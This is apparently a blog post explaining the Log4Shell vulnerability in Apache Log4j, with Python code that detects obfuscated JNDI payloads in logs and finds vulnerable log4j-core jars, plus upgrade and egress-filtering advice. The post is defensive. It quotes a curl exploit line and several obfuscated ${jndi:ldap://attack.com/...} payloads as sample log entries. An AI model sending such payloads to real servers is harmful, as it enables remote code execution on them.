What is Log4j vulnerability? | CVE-2021-44228

The Log4j vulnerability (CVE-2021-44228, also known as Log4Shell) is a critical zero-day vulnerability discovered in Apache Log4j, the open source logging framework used to record activity within Java applications. It is triggered when a user sends a malicious payload in a request to a server running a Java application that logs that request with the Log4j package. A normal request carrying the payload in any field that gets logged, for example a header, is enough:


curl xxxxx -H 'X-Api-Version: ${jndi:ldap://attack.com/attack}'

The curl above sends a request to the XXXX server with a header value that Log4j, when it writes the header to the log, interprets as a lookup and resolves through the Java Naming and Directory Interface (JNDI). Instead of treating the string as plain text, Log4j connects over LDAP to the host named in the payload, here “attack.com”. An attacker who controls that LDAP server can answer with a reference to a remote Java class, which the vulnerable server downloads and executes, so the attacker can run arbitrary commands on it. Any logged input works, not just this header: user agents, form fields and usernames are all common delivery points, and the payload is often obfuscated (nested lookups, URL encoding) to slip past naive string filters.
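As an added example (not code from the original post or from the Log4j project), the following Python snippet shows the detection side of this: it normalizes obfuscated payloads the way Log4j's own string substitution would (nested ${lower:…} and ${upper:…} transforms, ${…:-default} tricks, plus one round of URL decoding) and flags log lines that carry a JNDI lookup once normalized. The access-log lines are constructed for the example, and attack.com is just the placeholder host from the curl command above.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Marker that replaces "${" on a lookup we leave unresolved, so the loop terminates.
_FROZEN = "\x00{"
# A resolved JNDI lookup and the scheme it dereferences (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve_lookup(body):
    """Evaluate one innermost lookup the way Log4j 2's substitution would, as far
    as a detector needs: lower/upper transforms and ":-" default values. Any other
    lookup without a default (jndi, env, sys, date, ...) is frozen in place."""
    if ":-" in body:
        head, default = body.split(":-", 1)
    else:
        head, default = body, None
    prefix, _, arg = head.partition(":")
    prefix = prefix.lower()          # Log4j matches lookup prefixes case-insensitively
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if default is not None:          # ${::-j}, ${env:NaN:-j}, ... collapse to the default
        return default
    return _FROZEN + body + "}"


def deobfuscate(text):
    """Percent-decode once, then collapse nested lookups from the inside out."""
    s = unquote(text)
    while True:
        resolved = _INNER.sub(lambda m: _resolve_lookup(m.group(1)), s)
        if resolved == s:
            break
        s = resolved
    return s.replace(_FROZEN, "${")


def scan_log_lines(lines):
    """Return (line_number, jndi_scheme, deobfuscated_line) for each line that,
    once normalized, contains a ${jndi:<scheme>:...} lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = deobfuscate(line)
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(1).lower(), norm))
    return hits


# Constructed access-log lines (not real traffic): a benign request, the plain
# payload, a nested-lookup obfuscation, a URL-encoded payload and a benign
# lookup-like string that must not be flagged.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attack.com/attack}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}d${::-i}:${env:NaN:-l}dap://attack.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattack.com%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:14:02:19 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, norm in scan_log_lines(SAMPLE_ACCESS_LOG):
        print(f"line {n}: jndi/{scheme}: {norm}")
```

The normalizer deliberately emulates only the parts of Log4j's substitution that attackers use for evasion (case transforms and default values); it decodes percent-encoding a single time, so double-encoded or base64-wrapped payloads still need an extra decoding pass in front of it, and a match should be treated as an attempt, not proof of compromise, until the server's outbound connections have been checked.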


More about it can be seen here – https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Solution: Log4j 2.15.0 was released with the JNDI lookup disabled by default, but that fix was later found to be incomplete (CVE-2021-45046), so upgrade to the latest 2.x release rather than stopping at 2.15.0. Where an upgrade is not immediately possible, remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from every log4j-core jar, which is the mitigation Apache recommends for older 2.x versions. Firewall rules help too, but note the direction: the LDAP connection is made outbound from the vulnerable server to the attacker, not inbound, so the useful rule is egress filtering that blocks outbound LDAP, RMI and other unexpected connections from critical servers to the internet and alerts on the attempts.
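To find which jars on a host actually need the fix, here is an added Python example (not code from the original post or from the Log4j project) that walks a directory tree, opens every jar/war/ear, including jars nested inside WARs and EARs, reads the log4j-core version from its Maven metadata, and reports whether the JndiLookup class is still present. The 2.17.1 threshold is the 2.x release that closes CVE-2021-44228 and its follow-up CVEs; the jars the demo scans are constructed fixtures that contain only the metadata paths the scanner looks at, not Log4j code.

```python
import io
import os
import re
import tempfile
import zipfile

# Class whose presence makes a log4j-core jar exploitable through JNDI lookups;
# Apache's mitigation for 2.x releases that cannot be upgraded is to delete it.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped inside every released log4j-core jar.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
# First 2.x release that closes CVE-2021-44228 and the follow-up CVEs
# (2.15.0 and 2.16.0 were incomplete fixes).
FIXED_2X = (2, 17, 1)


def parse_version(v):
    """'2.14.1' -> (2, 14, 1); trailing qualifiers like '-rc1' are ignored."""
    parts = []
    for piece in v.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def _version_of(zf):
    try:
        text = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in text.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def _scan_archive(zf, label, findings):
    names = zf.namelist()
    version = _version_of(zf)
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version is not None or has_jndi:
        # Needs action when JndiLookup is still there and the version is unknown or too old.
        findings.append({
            "path": label,
            "version": version,
            "jndi_lookup_present": has_jndi,
            "needs_action": has_jndi and (version is None or parse_version(version) < FIXED_2X),
        })
    # Recurse into archives packed inside WAR/EAR/fat jars (e.g. WEB-INF/lib/*.jar).
    for name in names:
        if name.lower().endswith(ARCHIVE_EXTS):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _scan_archive(inner, f"{label}!{name}", findings)


def scan_tree(root):
    """Return one finding dict per log4j-core jar found under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not fn.lower().endswith(ARCHIVE_EXTS):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(path) as zf:
                    _scan_archive(zf, os.path.relpath(path, root), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_tree(root):
    """Constructed fixture: fake log4j-core jars carrying only the metadata file and
    (optionally) the JndiLookup class path, plus a WAR that nests one of them."""
    def fake_core(version, with_jndi=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPERTIES, f"version={version}\ngroupId=org.apache.logging.log4j\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
        return buf.getvalue()

    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    for name, version, with_jndi in [
        ("log4j-core-2.14.1.jar", "2.14.1", True),           # vulnerable
        ("log4j-core-2.17.1.jar", "2.17.1", True),           # fixed release
        ("log4j-core-2.11.2-stripped.jar", "2.11.2", False), # old, but JndiLookup removed
    ]:
        with open(os.path.join(lib, name), "wb") as f:
            f.write(fake_core(version, with_jndi))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", fake_core("2.13.3"))  # vulnerable, nested


def demo():
    """Build the fixture in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

Run scan_tree against the application's install and library directories on the host itself; a stripped jar shows up with jndi_lookup_present false and is treated as mitigated, but it should still be scheduled for an upgrade, since removing the class protects only against the JNDI path and not against anything fixed in later releases.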

And you can test for this vulnerability by following the steps here – https://www.ramanean.com/how-to-test-for-log4j-vulnerability-in-your-java-app/

Shan

I am a Technical Architect who dabbles with different languages and technologies
